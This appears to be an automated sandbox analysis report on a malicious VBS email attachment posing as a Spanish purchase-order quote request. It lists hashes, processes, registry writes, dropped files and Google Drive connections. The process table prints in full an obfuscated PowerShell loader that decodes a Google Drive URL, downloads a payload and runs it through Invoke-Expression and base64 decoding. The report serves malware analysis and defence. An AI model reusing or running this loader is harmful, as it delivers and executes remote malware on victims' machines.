| File name: | SOLICITUD DE PRESUPUESTOS PEDIDO 19600.vbs |
| Full analysis: | https://app.any.run/tasks/195939b4-1c65-464e-b4d7-2cc6f598aeb9 |
| Verdict: | Malicious activity |
| Analysis date: | October 26, 2023, 08:59:28 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 64 bit) |
| Indicators: | |
| MIME: | text/plain |
| File info: | ASCII text, with very long lines, with CRLF line terminators |
| MD5: | 432AAE6BA4D05A55451D5475200A6A4E |
| SHA1: | B6DFE4B9B6F410A0118FE1A1615F234A07FF8289 |
| SHA256: | 950CAE4B1CC75540BF8E6F7F31D9B46231A3CDFB5ADED5D85B2CFEDC9E524E54 |
| SSDEEP: | 1536:pabOwodBADHItRJyrnT/NOCzg6l4+RePnygkLhO:Mb9sADIt8T/N1TlXQPygkLhO |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 1396 | C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7} | C:\Windows\SysWOW64\dllhost.exe | — | svchost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: COM Surrogate Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2304 | "C:\Program Files (x86)\windows mail\wab.exe" | C:\Program Files (x86)\windows mail\wab.exe | powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Contacts Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 2344 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "function Rigshosp ([String]$Bpiupcove){$Hairles = 8;For($Editorer=7; $Editorer -lt $Bpiupcove.Length-1; $Editorer+=$Hairles){$Konomiche=$Konomiche+$Bpiupcove.Substring($Editorer, 1)};$Konomiche;}$Pret=Rigshosp 'StortinhDykningtRidebantRakitispGenitivsSalesma:Noncont/Munkens/odylsapdPegeudsrVentilaiNonamenv CoiffeeStemmet.SpillekgScrapieoSpottenoForvansgSubdeanlBralrece Inculp.CordurocAfmrknioInterlum Stormd/ValloneuPragtskc Intell?affiancePreenfoxHygienipRowersuoRiglendrAfgiftstTadpole=LflaskedReaktiooShortchwMonotonnLuntetslFascicuoSeparataDecimaldIgnorer&Translui DeltardUncomfy=Frimrke1 PlanktVPrepackpQuirksoXBlrebethPseudos0Sonorif_Animalc1StealthqGteflleskritikeH HaggincThunderp FngendMKnaldedfautoplaEShoaledaLnudvikYStorkerEManzoniRDeepsskqHanseliL RydninkTeenybobSkraverH MarcesfBoligomgAffinitT InformTRosentrdKnockou2EnergisOElektroPMalefic ';$Konomiche01=Rigshosp 'KrummetiRomanfoePuntellxSuperle ';$Bstsb9= $Konomiche01;$Bague = Rigshosp ' Omform\LiniebrsJackhamyVelstansImproduwstingaroAchromawDiskett6Conchfi4Compute\CrossboWSkolieviSkudsmanPreimmud tilgano Forclow BronkisChesserPUsportsoAssertawLfterigeOrtopdirHyrekrsSUdskdfrhImpreciesamstemlsjomilclPapayac\XenopelvIgangsa1Indrykn.Enureti0Frdiges\OvercrepExdividoNdudganwhomalopePetitfor CapitasPresacrhOprrtseeFlyvelelUldgarnlUnspitt.Mundhuge DearsexUnprofieDioptid '; & ($Konomiche01) (Rigshosp 'Pirouet$SacmonspCampylorParenche MalaysfOperate2 Besvan=Indstte$MiraculeSaldodin DramatvCgilcam: Fjottew MikrooiFrakkekn PicturdunwilliiSupercorChkfils ') ; & ($Konomiche01) (Rigshosp ' Tracti$PolarlyBCitronsafrdigbygPrvetagu FilmbyeCirkusa=Slotsaf$NeelsfopGrizzlerAdminiseWeedlesfVecture2Oilwell+Rdbyerr$ForsrgeBOutblufaLurvedeg skytteuKarunaaecephalo ') ; &($Konomiche01) (Rigshosp 'watapeh$ UdklanMTempelho Lovhjer DescenoAsphetesClinomeinonbrowtValutatyBagstrv frowzle=Unmerch Tarpaul(Unravel(ChikaragunpresuwSuperlamUnparsoipukerai PlanocowFrardgsiAccomptnPusling3 Monism2Delvism_skvttedpTilskrirVisitreo FacetscMostlyaePyjamassTyrannosbefolkn Dannyar-MyoclonFKrnemlk AttracPStaatsrr LadyisoStetoskcUnderfoe UdspecsKimberlsoverrufIOpiniondFedtpro=Epigram$ Foruds{ unreitP OstracIKunsterD Interl}Alkohol)Afspisn.RavagerCCollecto Revisem BemrkemDuplicaaEntropin Fornavd SuperfLSlinkiniGgeungen Chokoletrykker)Retorer Symbol- BlodsbsSemitispAntecedlasbestoiSprinkltPlisser Lynchen[OptrkkecMessianh PreconaCrystalrmystaxv]Waterho3Bogkben4Wizened ');& ($Konomiche01) (Rigshosp ' Geosel$AlgebraG KrispilReconveyUndergrp Meningt GenetaoKonomaetEtabldlhPeriscleChloronrThermoe Grundsy=Ctgejoh Crcunde$AccentuMFlakineoSwimminr PaamnsoTmrerlrsViderefi OtherstLeverinyCiceron[undefen$TrustleMChawtunoslgtsborbaulkyhoEscutelsSubwardiTeaktrst HardocyTrollyi.OutlaugcOptimaloDragelsuFilovernMicrosktLithmij-Dorsula2Syncell] Consig '); & ($Konomiche01) (Rigshosp 'Flyvesp$Yawperih Polyptu Adressn LandinlPennyfliFllesfag Rakeagt TaxikruObambulfFewteru= Bestil(WhittieTForvanse FrinumsVandkmstprivati-LaicpenPWibroefaLiggerctVaccinehElision Ufrivil$OversetBSolfrieaRummendgPenslenu Beplane Klimab)Spytsug Lreproc- IsolatASmeltepn Springdxeropha Deserve(Preprom[pasteliIRadiochnTautolotMuggingPSkejsertAnhalourBlankes]Trickop: Dissol:Skydevismokelemi MisappzCitratseCoining helside-VariegaeDepecheqMuseers Toksiko8 Tornad)Gazookb ') ;if ($hunligtuf) { . $Bague $Glyptother;} else {;$Konomiche00=Rigshosp 'BigbandSInfuriat Opkrada BespytrRevisiotElektro-SkuettvBTowabiliIsoperitOversigsElectroTCloseuprStrejftaWormweenFormlessTreatytfShruggie HypocrrSexuali Snobbie-PlashetScigaretosmadderuBessemerReaffrocFlagknaenoncomm dryptrr$PileumbPStangvgrTelexereMischartEkskong Unwaive- UltrapDExtrateeSynchrosrosemartStutswaiKhedivanRelumeiaMastoidt XanthoiKommando Greenanunrecki Handels$ baalshpOverdecrOsteomee VestenfOpiniat2infused '; . ($Konomiche01) (Rigshosp 'Flisebe$QuodlibpTetragyrScoffmaeLogikprf Brutto2Blderne= Femeta$ Afluree SvindlnStenbruvAntiari:KammerhagastroepStabilip UnstredCachundaStenciltRennieaaUdbytte ') ; . ($Konomiche01) (Rigshosp 'UnabstrI Attakum BenzinpApsideroNaninaarGalejsltrepolar-signetrMCatherioSikkerhdSpiseseuCymegldlCazzieseGravame TiradeBProfileiEncraaltBogklubsAastedsTWagonerrInopporaOrdlistnTillidss Expiscf ConceseLukkemerAneuric ') ;$pref2=$pref2+'\Membe.des';while (-not $Poemerswhi6) { & ($Konomiche01) (Rigshosp 'Sdenlre$PhacidiPHormoneo ForefaeBoomahpmUdmagreeSandemnrIndkomssEkstempwPhysioghBandidoiWanderl6wacbrne=Counter(InfrequTLaundrye FormalsDiamanttBallers-CircuitPDragstraulovmedtUnemotihFlyvesi Calycli$Bageriep TentabrCirkusfeCrosswofUnmunif2 Quartz)Succede ') ; . ($Konomiche01) $Konomiche00; & ($Konomiche01) (Rigshosp 'BananskSplasmoctBergamoaFedestirSammenstOpnaael- SpantsSFessewildisketteMacropieLettroep Nahane Listwor5Nietzsc ');} . ($Konomiche01) (Rigshosp ' Lettil$InkludeCActionaaGennemsgCrossbreSkalpejsSyndflotRedefulePrecoll Superlp=Supraco MisestiGClimatoeGuyhelstStudies-BiporosCKipkalvoEvnernenEtruskitPartiese UnintrnInnardctStiftsp Bronch$ Talbehp Chiffor SayasaeBromethfProport2Skinnes '); . ($Konomiche01) (Rigshosp 'Coticin$foretimVHistoriiOrologis BoroflicatechibUppercul KaolinyUncommue GreeksyWipersc Decimal=Formats Pedalia[BrigantSAabenmuyWeekdaysWiedcont BilagseHamburgmOrganiz. TonsilCAssuranolugtgennAnonymivirritereKonfiskrDesugartWratack]Begning:Expecte:KarotinFStatsglrNightinoKaryoplmDamkultBFejlvurafeudovasSupercieFibrohe6Calcula4 HjerteS Diftont LycoperrotatioiFobienbncolloidg Myrist(Listepr$FingerkC NonrecaHaandvagAfholdeeRetsfors ErodibtTredjegeBandwor)Vildska '); . ($Konomiche01) (Rigshosp 'Sardine$EncompaKRelativoScovyfonSignalloFlskersmredheariforplumcWaxenkuhSkotteheCasitas2 Tigell Phyllos=Rekursi Antidyn[OnsskruS LynsnayNgleordsFremturtUnfastie VenezumBabbles.AdjusteTBuegangeBretagnxSeniorht Prebud. SnittaEMentoponHomebuicRefusiooheadgatdStephaniCibarion ManasigDaunsus]Raversk:Goldbri:BucksheAHypovitS transcCBilledbIForlfteIGunsind.LeopardGAntioxieecaudattDespotiSVeinbantHjernearShunteri tekstbn Kommang Uefter(Fanesze$okkerbeVKattepiiPostseasHaywirei AbonnebAfvrgellAutograyPhosphaeCyklamey Betjen)Endosse '); .($Konomiche01) (Rigshosp ' Lorica$InddirePKlverblrNonpunia WanreseKvllereg PazendeRevaliddCementseLokalplsResinkduBostonu2 Mavela2 vrvlet6Afgudsd=Suburba$SolidatKAntipatoScriptgnSextsunoHudormsmSclerodiResuspecUnpassihNegativeWisherl2ingjerd.Weightos SkralduPluvialbSamfundsRingridtLivmoder MouthpiteleomrnblaagaagMuscard(Mustach2Ardentl4Prgning2Fyrrety6Warrior9 Stereo6Parfume,Slvsmyk1Spdbarn8Reverse8Raiment9Circuli3Bandagi)Speaket '); .($Konomiche01) $Praegedesu226;}" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wscript.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
| 2536 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\SOLICITUD DE PRESUPUESTOS PEDIDO 19600.vbs" | C:\Windows\System32\wscript.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 Modules
| |||||||||||||||
| 2680 | "C:\Program Files (x86)\windows mail\wab.exe" | C:\Program Files (x86)\windows mail\wab.exe | — | dllhost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Contacts Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 2784 | "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "function Rigshosp ([String]$Bpiupcove){$Hairles = 8;For($Editorer=7; $Editorer -lt $Bpiupcove.Length-1; $Editorer+=$Hairles){$Konomiche=$Konomiche+$Bpiupcove.Substring($Editorer, 1)};$Konomiche;}$Pret=Rigshosp 'StortinhDykningtRidebantRakitispGenitivsSalesma:Noncont/Munkens/odylsapdPegeudsrVentilaiNonamenv CoiffeeStemmet.SpillekgScrapieoSpottenoForvansgSubdeanlBralrece Inculp.CordurocAfmrknioInterlum Stormd/ValloneuPragtskc Intell?affiancePreenfoxHygienipRowersuoRiglendrAfgiftstTadpole=LflaskedReaktiooShortchwMonotonnLuntetslFascicuoSeparataDecimaldIgnorer&Translui DeltardUncomfy=Frimrke1 PlanktVPrepackpQuirksoXBlrebethPseudos0Sonorif_Animalc1StealthqGteflleskritikeH HaggincThunderp FngendMKnaldedfautoplaEShoaledaLnudvikYStorkerEManzoniRDeepsskqHanseliL RydninkTeenybobSkraverH MarcesfBoligomgAffinitT InformTRosentrdKnockou2EnergisOElektroPMalefic ';$Konomiche01=Rigshosp 'KrummetiRomanfoePuntellxSuperle ';$Bstsb9= $Konomiche01;$Bague = Rigshosp ' Omform\LiniebrsJackhamyVelstansImproduwstingaroAchromawDiskett6Conchfi4Compute\CrossboWSkolieviSkudsmanPreimmud tilgano Forclow BronkisChesserPUsportsoAssertawLfterigeOrtopdirHyrekrsSUdskdfrhImpreciesamstemlsjomilclPapayac\XenopelvIgangsa1Indrykn.Enureti0Frdiges\OvercrepExdividoNdudganwhomalopePetitfor CapitasPresacrhOprrtseeFlyvelelUldgarnlUnspitt.Mundhuge DearsexUnprofieDioptid '; & ($Konomiche01) (Rigshosp 'Pirouet$SacmonspCampylorParenche MalaysfOperate2 Besvan=Indstte$MiraculeSaldodin DramatvCgilcam: Fjottew MikrooiFrakkekn PicturdunwilliiSupercorChkfils ') ; & ($Konomiche01) (Rigshosp ' Tracti$PolarlyBCitronsafrdigbygPrvetagu FilmbyeCirkusa=Slotsaf$NeelsfopGrizzlerAdminiseWeedlesfVecture2Oilwell+Rdbyerr$ForsrgeBOutblufaLurvedeg skytteuKarunaaecephalo ') ; &($Konomiche01) (Rigshosp 'watapeh$ UdklanMTempelho Lovhjer DescenoAsphetesClinomeinonbrowtValutatyBagstrv frowzle=Unmerch Tarpaul(Unravel(ChikaragunpresuwSuperlamUnparsoipukerai PlanocowFrardgsiAccomptnPusling3 Monism2Delvism_skvttedpTilskrirVisitreo FacetscMostlyaePyjamassTyrannosbefolkn Dannyar-MyoclonFKrnemlk AttracPStaatsrr LadyisoStetoskcUnderfoe UdspecsKimberlsoverrufIOpiniondFedtpro=Epigram$ Foruds{ unreitP OstracIKunsterD Interl}Alkohol)Afspisn.RavagerCCollecto Revisem BemrkemDuplicaaEntropin Fornavd SuperfLSlinkiniGgeungen Chokoletrykker)Retorer Symbol- BlodsbsSemitispAntecedlasbestoiSprinkltPlisser Lynchen[OptrkkecMessianh PreconaCrystalrmystaxv]Waterho3Bogkben4Wizened ');& ($Konomiche01) (Rigshosp ' Geosel$AlgebraG KrispilReconveyUndergrp Meningt GenetaoKonomaetEtabldlhPeriscleChloronrThermoe Grundsy=Ctgejoh Crcunde$AccentuMFlakineoSwimminr PaamnsoTmrerlrsViderefi OtherstLeverinyCiceron[undefen$TrustleMChawtunoslgtsborbaulkyhoEscutelsSubwardiTeaktrst HardocyTrollyi.OutlaugcOptimaloDragelsuFilovernMicrosktLithmij-Dorsula2Syncell] Consig '); & ($Konomiche01) (Rigshosp 'Flyvesp$Yawperih Polyptu Adressn LandinlPennyfliFllesfag Rakeagt TaxikruObambulfFewteru= Bestil(WhittieTForvanse FrinumsVandkmstprivati-LaicpenPWibroefaLiggerctVaccinehElision Ufrivil$OversetBSolfrieaRummendgPenslenu Beplane Klimab)Spytsug Lreproc- IsolatASmeltepn Springdxeropha Deserve(Preprom[pasteliIRadiochnTautolotMuggingPSkejsertAnhalourBlankes]Trickop: Dissol:Skydevismokelemi MisappzCitratseCoining helside-VariegaeDepecheqMuseers Toksiko8 Tornad)Gazookb ') ;if ($hunligtuf) { . $Bague $Glyptother;} else {;$Konomiche00=Rigshosp 'BigbandSInfuriat Opkrada BespytrRevisiotElektro-SkuettvBTowabiliIsoperitOversigsElectroTCloseuprStrejftaWormweenFormlessTreatytfShruggie HypocrrSexuali Snobbie-PlashetScigaretosmadderuBessemerReaffrocFlagknaenoncomm dryptrr$PileumbPStangvgrTelexereMischartEkskong Unwaive- UltrapDExtrateeSynchrosrosemartStutswaiKhedivanRelumeiaMastoidt XanthoiKommando Greenanunrecki Handels$ baalshpOverdecrOsteomee VestenfOpiniat2infused '; . ($Konomiche01) (Rigshosp 'Flisebe$QuodlibpTetragyrScoffmaeLogikprf Brutto2Blderne= Femeta$ Afluree SvindlnStenbruvAntiari:KammerhagastroepStabilip UnstredCachundaStenciltRennieaaUdbytte ') ; . ($Konomiche01) (Rigshosp 'UnabstrI Attakum BenzinpApsideroNaninaarGalejsltrepolar-signetrMCatherioSikkerhdSpiseseuCymegldlCazzieseGravame TiradeBProfileiEncraaltBogklubsAastedsTWagonerrInopporaOrdlistnTillidss Expiscf ConceseLukkemerAneuric ') ;$pref2=$pref2+'\Membe.des';while (-not $Poemerswhi6) { & ($Konomiche01) (Rigshosp 'Sdenlre$PhacidiPHormoneo ForefaeBoomahpmUdmagreeSandemnrIndkomssEkstempwPhysioghBandidoiWanderl6wacbrne=Counter(InfrequTLaundrye FormalsDiamanttBallers-CircuitPDragstraulovmedtUnemotihFlyvesi Calycli$Bageriep TentabrCirkusfeCrosswofUnmunif2 Quartz)Succede ') ; . ($Konomiche01) $Konomiche00; & ($Konomiche01) (Rigshosp 'BananskSplasmoctBergamoaFedestirSammenstOpnaael- SpantsSFessewildisketteMacropieLettroep Nahane Listwor5Nietzsc ');} . ($Konomiche01) (Rigshosp ' Lettil$InkludeCActionaaGennemsgCrossbreSkalpejsSyndflotRedefulePrecoll Superlp=Supraco MisestiGClimatoeGuyhelstStudies-BiporosCKipkalvoEvnernenEtruskitPartiese UnintrnInnardctStiftsp Bronch$ Talbehp Chiffor SayasaeBromethfProport2Skinnes '); . ($Konomiche01) (Rigshosp 'Coticin$foretimVHistoriiOrologis BoroflicatechibUppercul KaolinyUncommue GreeksyWipersc Decimal=Formats Pedalia[BrigantSAabenmuyWeekdaysWiedcont BilagseHamburgmOrganiz. TonsilCAssuranolugtgennAnonymivirritereKonfiskrDesugartWratack]Begning:Expecte:KarotinFStatsglrNightinoKaryoplmDamkultBFejlvurafeudovasSupercieFibrohe6Calcula4 HjerteS Diftont LycoperrotatioiFobienbncolloidg Myrist(Listepr$FingerkC NonrecaHaandvagAfholdeeRetsfors ErodibtTredjegeBandwor)Vildska '); . ($Konomiche01) (Rigshosp 'Sardine$EncompaKRelativoScovyfonSignalloFlskersmredheariforplumcWaxenkuhSkotteheCasitas2 Tigell Phyllos=Rekursi Antidyn[OnsskruS LynsnayNgleordsFremturtUnfastie VenezumBabbles.AdjusteTBuegangeBretagnxSeniorht Prebud. SnittaEMentoponHomebuicRefusiooheadgatdStephaniCibarion ManasigDaunsus]Raversk:Goldbri:BucksheAHypovitS transcCBilledbIForlfteIGunsind.LeopardGAntioxieecaudattDespotiSVeinbantHjernearShunteri tekstbn Kommang Uefter(Fanesze$okkerbeVKattepiiPostseasHaywirei AbonnebAfvrgellAutograyPhosphaeCyklamey Betjen)Endosse '); .($Konomiche01) (Rigshosp ' Lorica$InddirePKlverblrNonpunia WanreseKvllereg PazendeRevaliddCementseLokalplsResinkduBostonu2 Mavela2 vrvlet6Afgudsd=Suburba$SolidatKAntipatoScriptgnSextsunoHudormsmSclerodiResuspecUnpassihNegativeWisherl2ingjerd.Weightos SkralduPluvialbSamfundsRingridtLivmoder MouthpiteleomrnblaagaagMuscard(Mustach2Ardentl4Prgning2Fyrrety6Warrior9 Stereo6Parfume,Slvsmyk1Spdbarn8Reverse8Raiment9Circuli3Bandagi)Speaket '); .($Konomiche01) $Praegedesu226;}" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
| (PID) Process: | (2536) wscript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
| (PID) Process: | (2536) wscript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | IntranetName |
Value: 1 | |||
| (PID) Process: | (2536) wscript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
| (PID) Process: | (2536) wscript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | AutoDetect |
Value: 0 | |||
| (PID) Process: | (2784) powershell.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
| (PID) Process: | (2784) powershell.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | IntranetName |
Value: 1 | |||
| (PID) Process: | (2784) powershell.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
| (PID) Process: | (2784) powershell.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | AutoDetect |
Value: 0 | |||
| (PID) Process: | (2784) powershell.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\156\52C64B7E |
| Operation: | write | Name: | LanguageList |
Value: en-US | |||
| (PID) Process: | (2304) wab.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
| Operation: | write | Name: | ProxyEnable |
Value: 0 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 2344 | powershell.exe | C:\Users\admin\AppData\Local\Temp\1io51gfp.moa.psm1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:— | |||
| 2784 | powershell.exe | C:\Users\admin\AppData\Local\Temp\otlfbtrs.441.ps1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:— | |||
| 2784 | powershell.exe | C:\Users\admin\AppData\Local\Temp\f24xnhal.u4n.psm1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:— | |||
| 2344 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | |
MD5:446DD1CF97EABA21CF14D03AEBC79F27 | SHA256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF | |||
| 2344 | powershell.exe | C:\Users\admin\AppData\Local\Temp\axb4wxcd.ptl.ps1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:— | |||
| 2784 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | binary | |
MD5:8637E3C48E1AAF3566CD5C561474E39F | SHA256:BDBF3AF4795B1EEEA955FEAD12EE7F1FABBDDC4410816B668F71C73CE0F2CF3C | |||
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
324 | svchost.exe | 224.0.0.252:5355 | — | — | — | unknown |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
1956 | svchost.exe | 239.255.255.250:1900 | — | — | — | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
884 | svchost.exe | 142.250.186.174:443 | drive.google.com | GOOGLE | US | whitelisted |
884 | svchost.exe | 142.250.185.97:443 | doc-08-10-docs.googleusercontent.com | GOOGLE | US | whitelisted |
2304 | wab.exe | 142.250.186.174:443 | drive.google.com | GOOGLE | US | whitelisted |
2304 | wab.exe | 142.250.185.97:443 | doc-08-10-docs.googleusercontent.com | GOOGLE | US | whitelisted |
Domain | IP | Reputation |
|---|---|---|
drive.google.com |
| shared |
doc-08-10-docs.googleusercontent.com |
| shared |
doc-0s-10-docs.googleusercontent.com |
| shared |